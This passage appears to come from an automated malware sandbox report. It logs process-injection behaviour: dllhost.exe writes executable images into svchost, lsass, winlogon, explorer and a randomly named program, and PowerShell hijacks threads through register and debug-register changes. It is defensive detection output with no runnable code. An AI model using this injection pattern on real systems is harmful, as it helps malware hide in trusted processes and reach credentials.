Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1D865090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 199015D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 188D6710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 29F37400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 2580 base: 32F0000 value: 4D
Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 2580 base: 32F0000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 5968	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 6808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 2844

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: 5968 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 2F00000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 947DB66010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCCA00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927050000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000
